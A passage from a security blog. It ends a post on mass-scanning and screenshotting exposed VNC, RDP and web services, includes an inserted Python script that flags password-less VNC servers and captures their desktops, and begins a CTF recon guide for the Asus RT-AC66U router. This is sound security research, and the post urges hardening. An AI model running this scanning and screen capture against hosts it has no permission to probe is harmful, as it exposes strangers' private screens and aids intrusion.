<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCKL3THMzrVjNTb-hjYUUvxhgMhLL6f_BdE2wJvZJzEY-llWNP_tasjiqcZdoByaeritHuXfr4fmvj18f2n9TuyhoYg1Qmt-_5ltacOo0011n-ZZrXINPIvrRXgJeMPJNUprxBfjuyAyJj/s1600/Screenshot+from+2014-08-16+19%5E6%5E%01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCKL3THMzrVjNTb-hjYUUvxhgMhLL6f_BdE2wJvZJzEY-llWNP_tasjiqcZdoByaeritHuXfr4fmvj18f2n9TuyhoYg1Qmt-_5ltacOo0011n-ZZrXINPIvrRXgJeMPJNUprxBfjuyAyJj/s1600/Screenshot+from+2014-08-16+19%5E6%5E%01.png" height="345" width="400" /></a></div>
<br />
4 - Profit!!!<br />
<br />
Now all you have to do is masscan the target for ports 5900-5910 (used by VNC), save the results to a text file and create a simple script to take the screenshots. You can also try <a href="https://github.com/shamun/vncsnapshot">vncsnapshot</a>, used by <a href="https://twitter.com/paulm">@paulm</a> during his <a href="https://github.com/PaulMcMillan/toorcon_2013">Toorcon 2013 talk</a>.<br />
<br />
<b>RDP</b><br />
<br />
My tool of choice for taking snapshots of RDP services is <a href="http://www.remotespark.com/">Spark View</a>. There's an <a href="http://www.remotespark.com/html5.html">HTML5 version</a> of the tool available <a href="http://www.remotespark.com/html5.html">here</a> and the process is quite similar to the VNC one:<br />
<br />
1 - Download and install Spark View for <a href="http://www.remotespark.com/view/SparkGateway-installer.exe">Windows </a>or <a href="http://www.remotespark.com/view/SparkGateway.zip">Linux</a>. Follow the procedure from the <a href="http://www.remotespark.com/view/AdminManual.pdf">Admin Manual</a>: install the J2SE JDK, set the JAVA_HOME environment variable, then extract, configure and compile the utilities from commons-daemon-native.tar.gz. On Debian derivatives, you may need to edit <i>SparkGateway.sh</i> and change the source function library to "/lib/lsb/init-functions".<br />
<br />
2 - Start the service (./SparkGateway.sh start) and test it by accessing your local IP on port 80. Remote Spark provides a live demo for their solution <a href="http://www.remotespark.com:8080/">here</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgX0jB_nQlKeex36V56UjjNPkQdtgyVsAEvs07j0uxBuE_5fB-m8OMsiNS1igeYy8q_tTcnKOvTlTu9sqfxfevkusqvOTf-jky8fJgejlwmK0Q9oZlMcKOeAbYMw0NxjjTqgUmp5pic127o/s1600/rdp1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgX0jB_nQlKeex36V56UjjNPkQdtgyVsAEvs07j0uxBuE_5fB-m8OMsiNS1igeYy8q_tTcnKOvTlTu9sqfxfevkusqvOTf-jky8fJgejlwmK0Q9oZlMcKOeAbYMw0NxjjTqgUmp5pic127o/s1600/rdp1.png" height="244" width="320" /></a></div>
<br />
3 - Specify the RDP server settings on the querystring and take a webpage screenshot using a command line tool. I'm going to use <a href="http://phantomjs.org/">phantomjs</a> + <a href="https://gist.github.com/sbehrens/11384864">url-to-image.js</a> for this example:<br />
<br />
<div class="code">
phantomjs url-to-image.js "http://127.0.0.1/rdpdirect.html?gateway=127.0.0.1&server=192.168.1.189&width=800&height=600&color=16" rdp.png 800 600</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguqSI4gRzzUCaVS7vVxazJr5JAQ2KNyUVhKX7XFxKXiK9NfZfmQGpUdZEghqSG1vw_jCG1PaHPXUUv33FkIc2gzopLQLKvdMF6cz7wAjQhnpnV2J59JgIC-HXMl5EfNGaJDlFJDxXLw9VC/s1600/rdp2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguqSI4gRzzUCaVS7vVxazJr5JAQ2KNyUVhKX7XFxKXiK9NfZfmQGpUdZEghqSG1vw_jCG1PaHPXUUv33FkIc2gzopLQLKvdMF6cz7wAjQhnpnV2J59JgIC-HXMl5EfNGaJDlFJDxXLw9VC/s1600/rdp2.png" height="366" width="400" /></a></div>
<br />
4 - Profit!!!<br />
<br />
Some commercial tools like Nessus also connect to RDP services and <a href="http://www.tenable.com/blog/nessus-52-released">capture screenshots</a>. Taking screenshots of RDP services is very useful for fingerprinting operating systems and for mapping/identifying domains and users on the network. I always feed these images to <a href="https://help.ubuntu.com/community/OCR">OCR</a> tools like <a href="https://code.google.com/p/tesseract-ocr/">tesseract</a> and <a href="http://jocr.sourceforge.net/">gocr</a> in order to generate wordlists and compile other useful data:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_H2-BUlhw7RVJ5baXEutK7ZA8S0xdggc5dtCLDu4q2ZgDbx2TsSLIs1xXIue1EKuhMu0L-BaYZVyHifS7j4FIRmXlYzzAwDN9ilELi_S1xCUGc-sTmziyOipzATfoVTbGmzWvoUJvSumh/s1600/ocr1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_H2-BUlhw7RVJ5baXEutK7ZA8S0xdggc5dtCLDu4q2ZgDbx2TsSLIs1xXIue1EKuhMu0L-BaYZVyHifS7j4FIRmXlYzzAwDN9ilELi_S1xCUGc-sTmziyOipzATfoVTbGmzWvoUJvSumh/s1600/ocr1.png" height="260" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">RDP screenshot</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLdGE6BMbunozSBgNEnTf0EFcOLzQw1eoi-4xDJwvwdMdCgyDAfabv0CS-6k5d7oWM_u-I5upEwUqp66W3VRh2kIKpKTpu1c12ekY6L9O9yNNuBt-IVvfctyFL1qAgrRwyDSAJRrgHLq5J/s1600/ocr2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLdGE6BMbunozSBgNEnTf0EFcOLzQw1eoi-4xDJwvwdMdCgyDAfabv0CS-6k5d7oWM_u-I5upEwUqp66W3VRh2kIKpKTpu1c12ekY6L9O9yNNuBt-IVvfctyFL1qAgrRwyDSAJRrgHLq5J/s1600/ocr2.png" height="157" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">gocr output</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjakLIQy_mgCme04C9iISLNwgcNsVpwUHuzmpBUeFEIpTF5IZX4SMdV0UHp9kaDFj7I63PaGREDWg4ehc5Te56XjX5TB9tA83ckiueFqukZZOGkvN_Y1ggscOofKRDq2dYGVQF-PEtfxl_R/s1600/ocr3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjakLIQy_mgCme04C9iISLNwgcNsVpwUHuzmpBUeFEIpTF5IZX4SMdV0UHp9kaDFj7I63PaGREDWg4ehc5Te56XjX5TB9tA83ckiueFqukZZOGkvN_Y1ggscOofKRDq2dYGVQF-PEtfxl_R/s1600/ocr3.png" height="185" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">tesseract output</td></tr>
</tbody></table>
<br />
<b>HTTP</b><br />
<b><br /></b>
There isn't much to say about web service screenshots. There are lots of posts covering this topic and lots of different tools, including an Nmap NSE script. Some references:<br />
<br />
- <a href="http://blog.spiderlabs.com/2012/06/using-nmap-to-screenshot-web-services.html">Using Nmap to Screenshot Web Service (http-screenshot.nse</a>)<br />
- <a href="http://wiki.securityweekly.com/wiki/index.php/Episode295">PaulDotCom Security Weekly 295 - Tech Segment</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSlgHO66w1Un_galDlXTqLyKyVB5nadtMyQHgMp1lViYWzjuK8j9caCtVLJVMJNZc_Rc-UQm1rWq6gHjL-BJo9xXZwEp2XuNZgK-DvvKPzl6N0iaNMgrJOUUF1-rP3NkK_kUmEVoEfYxEj/s1600/nmap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSlgHO66w1Un_galDlXTqLyKyVB5nadtMyQHgMp1lViYWzjuK8j9caCtVLJVMJNZc_Rc-UQm1rWq6gHjL-BJo9xXZwEp2XuNZgK-DvvKPzl6N0iaNMgrJOUUF1-rP3NkK_kUmEVoEfYxEj/s1600/nmap.png" height="143" width="400" /></a></div>
<br />
- <a href="https://www.christophertruncer.com/eyewitness-triage-tool/">EyeWitness - A Web Application Triage and Info-Gathering Tool</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh75LTnpPvsHRCxZOePJ6YJb9n9s5WfDSfCNRzYd-5nrmvRWesODJKSISBDHiIBc85royBZI-_kIC_vLYJqhWCFj5X-1Bfiy3igjJDFsEuKf_gaod_rbma-sFRxc3WXp-UDsggfZKMdk2mP/s1600/EyeWitnessUI.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh75LTnpPvsHRCxZOePJ6YJb9n9s5WfDSfCNRzYd-5nrmvRWesODJKSISBDHiIBc85royBZI-_kIC_vLYJqhWCFj5X-1Bfiy3igjJDFsEuKf_gaod_rbma-sFRxc3WXp-UDsggfZKMdk2mP/s1600/EyeWitnessUI.png" height="131" width="400" /></a></div>
<br />
<b>Conclusion</b><br />
<b><br /></b>
I find these tips very useful for getting a better view of network services. Now that reporters are getting a pretty good idea of the attacker's perspective, you have no excuse to leave your <a href="https://twitter.com/semibogan/status/499787869066498048">curtains exposed</a> to the Internet without a VNC password. It's also important to practice safe computing: change default passwords and enable <a href="https://en.wikipedia.org/wiki/Network_Level_Authentication">Network Level Authentication</a> for RDP services.<br />
<br />
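The "simple script" the VNC section calls for, combined with a check for the point made in the conclusion about password-less VNC, as an added example that is not part of the original post: it parses masscan -oL output, performs only the RFB version and security-type exchange (RFC 6143) with each endpoint to learn whether the server offers the "None" security type, and can optionally run the post's noVNC + CutyCapt pair per host. Assumed: masscan -oL input, and launch.sh/cutycapt in the locations the post uses.

```python
#!/usr/bin/env python3
"""Inventory the VNC endpoints masscan found: record each server's RFB version
and offered security types, flag servers that accept "None" (no password), and
optionally take the noVNC + CutyCapt screenshot described in the post.
Added example, not code from the post or from noVNC/CutyCapt. Assumes masscan
-oL input and, for screenshots, ./noVNC/utils/launch.sh and cutycapt installed."""
import csv
import re
import socket
import subprocess
import sys
import time

# masscan -oL lines look like "open tcp 5900 192.168.1.142 1408213243"
MASSCAN_LIST_RE = re.compile(r"^open\s+tcp\s+(\d+)\s+(\S+)\s+\d+$")
RFB_BANNER_RE = re.compile(rb"^RFB (\d{3})\.(\d{3})\n$")
# security types from RFC 6143; anything else is reported by number
SECURITY_TYPE_NAMES = {1: "None", 2: "VNCAuth", 16: "Tight", 18: "TLS", 19: "VeNCrypt"}

def parse_masscan_list(text):
    """Return [(host, port), ...]; the '#' header/footer lines are skipped."""
    endpoints = []
    for line in text.splitlines():
        m = MASSCAN_LIST_RE.match(line.strip())
        if m:
            endpoints.append((m.group(2), int(m.group(1))))
    return endpoints

def parse_security_types(banner, data):
    """Decode the security message after the version exchange -> ((major, minor), [types])."""
    m = RFB_BANNER_RE.match(banner)
    if not m:
        raise ValueError("not an RFB banner: %r" % banner)
    version = (int(m.group(1)), int(m.group(2)))
    if version < (3, 7):
        # RFB 3.3: the server dictates a single security type as a U32 (0 = failed)
        if len(data) < 4:
            raise ValueError("short RFB 3.3 security message")
        sec = int.from_bytes(data[:4], "big")
        return version, ([sec] if sec else [])
    # RFB 3.7/3.8: U8 count, then that many U8 security types; count 0 means the
    # connection failed and is followed by a reason string we do not need
    if not data:
        raise ValueError("empty security-types message")
    count = data[0]
    if len(data) < 1 + count:
        raise ValueError("truncated security-types list")
    return version, list(data[1:1 + count])

def requires_password(types):
    """False when type 1 ("None") is offered: anyone can attach to the desktop."""
    return 1 not in types

def probe_vnc(host, port, timeout=5.0):
    """Run only the version/security exchange, then close; nothing but a version string is sent."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = s.recv(12)
        if not RFB_BANNER_RE.match(banner):
            raise ValueError("not an RFB banner: %r" % banner)
        # answer with the server's version, capped at 3.8 (the newest we decode)
        s.sendall(min(banner, b"RFB 003.008\n"))
        data = s.recv(260)
    return parse_security_types(banner, data)

def screenshot(host, port, out_png, listen=6080):
    """The post's two commands, run back to back: noVNC's launcher, then CutyCapt."""
    launch = ["./noVNC/utils/launch.sh", "--vnc", "%s:%d" % (host, port),
              "--listen", str(listen)]
    capture = ["cutycapt", "--url=http://127.0.0.1:%d/vnc_auto.html" % listen,
               "--javascript=on", "--out=%s" % out_png, "--delay=3000"]
    proxy = subprocess.Popen(launch, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    try:
        time.sleep(2)  # give the websockify proxy a moment to start listening
        subprocess.run(capture, check=False, timeout=60)
    finally:
        proxy.terminate()
        proxy.wait()

def main(masscan_file, with_screenshots=False):
    """Write a CSV inventory to stdout, one row per endpoint from the masscan file."""
    writer = csv.writer(sys.stdout)
    writer.writerow(["host", "port", "rfb_version", "security_types", "needs_password"])
    for host, port in parse_masscan_list(open(masscan_file).read()):
        try:
            version, types = probe_vnc(host, port)
        except (OSError, ValueError) as exc:
            writer.writerow([host, port, "error", str(exc), ""])
            continue
        names = "|".join(SECURITY_TYPE_NAMES.get(t, str(t)) for t in types)
        writer.writerow([host, port, "%d.%d" % version, names, requires_password(types)])
        if with_screenshots:
            screenshot(host, port, "vnc_%s_%d.png" % (host, port))

if __name__ == "__main__":
    main(sys.argv[1], with_screenshots="--screenshot" in sys.argv[2:])
```

Run it as `python3 vnc_inventory.py scan.txt` for the CSV alone, or add `--screenshot` to also produce one PNG per endpoint.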
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2M98ugbUCat192BjagfCJ7lKUaBj9JIWa7ara-JjWR4vIQ4TqZzUArLxbPagn_43WS4Yr5yssSeUrVuhDEfwFOAEElcr6hqzb75LxCFWG2iNmidP_zTbhnoiqsv350yB1uoR3FHaZf4K6/s1600/movie.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2M98ugbUCat192BjagfCJ7lKUaBj9JIWa7ara-JjWR4vIQ4TqZzUArLxbPagn_43WS4Yr5yssSeUrVuhDEfwFOAEElcr6hqzb75LxCFWG2iNmidP_zTbhnoiqsv350yB1uoR3FHaZf4K6/s1600/movie.PNG" height="383" width="400" /></a></div>
Bernardo Rodrigues<br />
<br />
<b>Hacking Asus RT-AC66U and Preparing for SOHOpelesslyBroken CTF</b> (published 2014-07-17, updated 2014-07-21)<br />
<br />
So it's finally July, time to pack for DEFCON, follow <a href="https://twitter.com/defconparties">@defconparties</a> on Twitter and decide which <a href="http://defcne.net/villages/22">villages</a> to visit and which <a href="https://www.defcon.org/html/defcon-22/dc-22-schedule.html">talks</a> to attend.<br />
<br />
There's a new hacking competition this year called <a href="http://sohopelesslybroken.com/">SOHOpelesslyBroken</a>, presented by ISE and EFF. The objective of <a href="http://sohopelesslybroken.com/track0.php">Track 0</a> is to demonstrate previously unidentified vulnerabilities in off-the-shelf consumer wireless routers. <a href="http://sohopelesslybroken.com/track1.php">Track 1</a> will hold a live CTF for the duration of DEFCON. CTFs are always fun and this contest involves hacking real embedded devices, which makes it even more fun.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0AIOg6mrk7OiBCMvNP6Ioj0HtU9O48MaW0tS475ge8K0Pph0fOdZ7ZgGvstrwnyhOlkSBlLH0CU8tDaQyFZCJGWRser-m01Fx8d1hfYDZOaAAjG5vqvOYjAndt4g3qdqoloEiPgbrxs7H/s1600/meme2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0AIOg6mrk7OiBCMvNP6Ioj0HtU9O48MaW0tS475ge8K0Pph0fOdZ7ZgGvstrwnyhOlkSBlLH0CU8tDaQyFZCJGWRser-m01Fx8d1hfYDZOaAAjG5vqvOYjAndt4g3qdqoloEiPgbrxs7H/s1600/meme2.png" height="304" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Yes, that's my workstation =P</td></tr>
</tbody></table>
I'm particularly interested in the <a href="https://openwireless.org/">EFF Open Wireless Router</a>, but they haven't disclosed details about the device yet. According to the <a href="http://sohopelesslybroken.com/track0.php">event rules</a>, the <a href="https://wikidevi.com/wiki/ASUS_RT-AC66U">ASUS RT-AC66U</a> (HW Ver. A2) [Version 3.0.0.4.266] is one of the possible targets. As I had a spare RT-AC66U at home, I decided to write a quick guide for everyone interested in participating in this <strike>competition</strike> CTF.<br />
<br />
<b>recon</b><br />
<br />
The first thing to do is to find the firmware and its source code. Fortunately, the Asus RT-AC66U firmware is GPL'ed and we can easily find its source online. The version used for the contest is an old one, from 2012. In order to perform a better analysis, we are going to grab the sources and the firmware for v3.0.0.4.266 and v3.0.0.4.376.1123 (the most recent one as of this writing).<br />
<br />
<ul>
<li><a href="http://ftp.tekwind.co.jp/pub/asustw/wireless/RT-AC66U/FW_RT_AC66U_VER3004266.zip">Asus RT-AC66u v3.0.0.4.266 - Firmware</a></li>
<li><a href="http://ftp.tekwind.co.jp/pub/asustw/wireless/RT-AC66U/GPL_RT_AC66U_VER3004266.zip">Asus RT-AC66u v3.0.0.4.266 - Source Code</a></li>
<li><a href="http://dlcdnet.asus.com/pub/ASUS/wireless/RT-AC66U/FW_RT_AC66U_30043761123.zip">Asus RT-AC66u v3.0.0.4.376.1123 - Firmware</a></li>
<li><a href="http://dlcdnet.asus.com/pub/ASUS/wireless/RT-AC66U/GPL_RT-AC66U_30043761123.zip">Asus RT-AC66u v3.0.0.4.376.1123 - Source Code</a></li>
</ul>
<br />
Many firmware versions were published between these two releases; we can review the changelogs to find security issues:<br />
<br />
<ul>
<li><a href="http://www.asus.com/Networking/RTAC66U/HelpDesk_Download/">http://www.asus.com/Networking/RTAC66U/HelpDesk_Download</a></li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYVTyUVmPGFbj615W_vs2LAzTBR9b3V_yrezPlZI4hPtlO3IgGdq9EMXRZmHcC_8UnG_p-LR-bTa1X0OByywPsivynVU8BnFdLi_GiugTNcQOpR2ARHCwAIHLSqLaYvqJGWceDJblU6bxK/s1600/sec1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYVTyUVmPGFbj615W_vs2LAzTBR9b3V_yrezPlZI4hPtlO3IgGdq9EMXRZmHcC_8UnG_p-LR-bTa1X0OByywPsivynVU8BnFdLi_GiugTNcQOpR2ARHCwAIHLSqLaYvqJGWceDJblU6bxK/s1600/sec1.png" height="235" width="400" /></a></div>
<br />
According to the rules, we have to identify and exploit a 0-day vulnerability. We can combine different flaws with known issues in order to score points. If the vendor silently patched an issue and you write an exploit for it, that should still be scored as a valid 0-day (I'm not going to start discussing terminologies here).<br />
<br />
Now that we have the source code, it's time to extract and audit it. The <a href="https://trailofbits.github.io/ctf">CTF Field Guide</a> from Trail of Bits has some good resources on <a href="https://trailofbits.github.io/ctf/vulnerabilities/source.html">Auditing Source Code</a>. You can use tools like <a href="http://www.scootersoftware.com/">Beyond Compare</a>, <a href="http://www.araxis.com/merge/">Araxis Merge</a> and <a href="http://winmerge.org/">WinMerge</a> on Windows platforms, or <a href="http://meldmerge.org/">Meld</a> if you're more of a Linux user.<br />
<br />
Let's focus on the "/asuswrt/release/src/router/" directory, comparing these two folders using Meld:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpU_9Vz6Z-wxyt-cpP-x5o9IAAyRA8eNODsTdXI7-hRUPk8bqFaV2PQmxHEspXsNNPpxny1rEqbl68_t038qJCsJ2wvvd4rfR7TUIopJ3rwbLbbjMaxpLeCLpICrDcxSpP4yvegzYVc-hq/s1600/Screenshot+from+2014-07-12+23%5E%2530%5E%2556.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpU_9Vz6Z-wxyt-cpP-x5o9IAAyRA8eNODsTdXI7-hRUPk8bqFaV2PQmxHEspXsNNPpxny1rEqbl68_t038qJCsJ2wvvd4rfR7TUIopJ3rwbLbbjMaxpLeCLpICrDcxSpP4yvegzYVc-hq/s1600/Screenshot+from+2014-07-12+23%5E%2530%5E%2556.png" height="363" width="640" /></a></div>
<br />
There are many security advisories for this router: if you want to find 0-days you should look for disclosed vulnerabilities and exploits to avoid duplicates (believe me, this is the hardest part). Some references:<br />
<br />
<ul>
<li><a href="http://infosec42.blogspot.com.br/2013/07/exploit-asus-rt-ac66u-remote-root.html">ASUS RT-AC66U Remote Root (Broadcom ACSD)</a></li>
<li><a href="http://www.securityfocus.com/archive/1/526942">ASUS RT-N66U Router - HTTPS Directory traversal and full file access and credential disclosure vuln</a></li>
<li><a href="https://hatriot.github.io/blog/2013/06/05/asus-rt56u-remote-command-injection/">Asus RT56U Remote Command Injection</a></li>
<li><a href="http://securityevaluators.com/knowledge/case_studies/routers/asus_rtn56u.php">Taking over the ASUS RT-N56U and RT-AC66U</a></li>
<li><a href="http://arstechnica.com/security/2014/02/dear-asus-router-user-youve-been-pwned-thanks-to-easily-exploited-flaw/">Dear Asus router user: You’ve been pwned, thanks to easily exploited flaw (Asusgate)</a></li>
<li><a href="http://osvdb.com/search?search%5Bvuln_title%5D=asus&search%5Btext_type%5D=alltext">OSVDB</a></li>
</ul>
<br />
Points are deducted from your score if your exploit requires a special system configuration or specific information. If you want to score lots of points, you should be targeting default services and processes.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEz_oajJJQtcoUdjeoVaBr4IC0DGw1oCFyR-UHe2Ysd680egvW4P_zsGgOy92pe2XU8b3ChG_cGF-eFhYzHhNd9tRu9N1hNpjG5ZM_DBsy45TZheraVBkTAe2VNoGj8xY4NUg6rWNc4Z1I/s1600/ps.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEz_oajJJQtcoUdjeoVaBr4IC0DGw1oCFyR-UHe2Ysd680egvW4P_zsGgOy92pe2XU8b3ChG_cGF-eFhYzHhNd9tRu9N1hNpjG5ZM_DBsy45TZheraVBkTAe2VNoGj8xY4NUg6rWNc4Z1I/s1600/ps.PNG" height="330" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
The USB application tab on the RT-AC66U allows the user to set up a series of services like FTP, DLNA, NFS and Samba:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRPDWub1KptkmejG2vy3HZTWR02w9dmGa4KdrfI5P0Fnt9YoeCrQ6Z-oGuJ4mHogmloEDqj8m8IYOfAo6i7nRT4NntDqRDWB0h2ElTkO2iy-nwXlnX1ghT-QIwF1rpaOXvm1H8mFRbVOFu/s1600/media.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRPDWub1KptkmejG2vy3HZTWR02w9dmGa4KdrfI5P0Fnt9YoeCrQ6Z-oGuJ4mHogmloEDqj8m8IYOfAo6i7nRT4NntDqRDWB0h2ElTkO2iy-nwXlnX1ghT-QIwF1rpaOXvm1H8mFRbVOFu/s1600/media.PNG" height="272" width="400" /></a></div>
<br />
MiniDLNA is also a nice target. It should be pretty easy to find vulns in the service using <a href="https://twitter.com/zcutlip">Zachary Cutlip</a>'s <a href="http://shadow-file.blogspot.com.br/2014/05/infiltrate-2014.html">research</a>, as he broke it multiple times.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5_tbasGZV6urYnYEv05PYr3gI7sXqpnrTLEZD27QhvMJAmGNWFeXLZFHi7Obx24iUfiw-PHLFWtMNk4ot3l14CSYqoY8pfCmIrK9q_SVO7U7ll-J-CPIZAROJYf31ed6dm5doIDyjPtU3/s1600/diff.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5_tbasGZV6urYnYEv05PYr3gI7sXqpnrTLEZD27QhvMJAmGNWFeXLZFHi7Obx24iUfiw-PHLFWtMNk4ot3l14CSYqoY8pfCmIrK9q_SVO7U7ll-J-CPIZAROJYf31ed6dm5doIDyjPtU3/s1600/diff.png" height="363" width="640" /></a><br />
<br />
Another <strike>potentially</strike> vulnerable service is AiCloud: it links your home network to an online Web storage service and lets you access it through a mobile application:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdADUAQ-CV1FOn6CnPc8-mlWhSEdVY4bmkrFinKxL3inWo0v1NQIO05h8EGSXGULpgPKBimjnGbPycLqru8n6w3NSAtwM9D-HeQaxkdMyAAyFbstp6VTgjGyhLHFdSYWMdvJRe8BykXwiU/s1600/aicloud.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdADUAQ-CV1FOn6CnPc8-mlWhSEdVY4bmkrFinKxL3inWo0v1NQIO05h8EGSXGULpgPKBimjnGbPycLqru8n6w3NSAtwM9D-HeQaxkdMyAAyFbstp6VTgjGyhLHFdSYWMdvJRe8BykXwiU/s1600/aicloud.PNG" height="330" width="400" /></a></div>
<br />
<b>forensic</b><br />
<br />
While part of the team audits the source code, the forensics guys should be unpacking the firmware using binwalk + fmk:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6-_FufdOjctWbvC-hbt9xDj-jWGrQWai84jDU8GmZ7-__6KueYkcBooeH2qUBzQ9UeVwv1bdxO5_ere7lcbGtMwrfv3_o2gCKsfRRuVTF9-0ceiSThrkHsXtw2ObqWPugvzP_SANuEPrM/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6-_FufdOjctWbvC-hbt9xDj-jWGrQWai84jDU8GmZ7-__6KueYkcBooeH2qUBzQ9UeVwv1bdxO5_ere7lcbGtMwrfv3_o2gCKsfRRuVTF9-0ceiSThrkHsXtw2ObqWPugvzP_SANuEPrM/s1600/1.png" height="138" width="400" /></a></div>
<br />
You may remember <a href="https://github.com/bmaia/binwally">binwally</a>, the tool I developed to <a href="http://w00tsec.blogspot.com/2013/12/binwally-directory-tree-diff-tool-using.html">perform binary tree diff using fuzzy hashing</a>. Binwalk has its own option to <a href="https://github.com/devttys0/binwalk/blob/master/src/binwalk/modules/hashmatch.py">perform fuzzy hashing against files and directories</a>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3URWWmb8mindeh26hxw0O_Tp0EtOyqgCu-twCYAu-FjE3tRNMAhSL_De2Pn4NcnT5oHCO7aXBV6SEmb4yhofcOcJxEDRBCL_CUkA_hWDRJy87oatd9tHkZQ6SEoFC87ImjlUqVvVJImny/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3URWWmb8mindeh26hxw0O_Tp0EtOyqgCu-twCYAu-FjE3tRNMAhSL_De2Pn4NcnT5oHCO7aXBV6SEmb4yhofcOcJxEDRBCL_CUkA_hWDRJy87oatd9tHkZQ6SEoFC87ImjlUqVvVJImny/s1600/2.png" height="250" width="400" /></a></div>
<br />
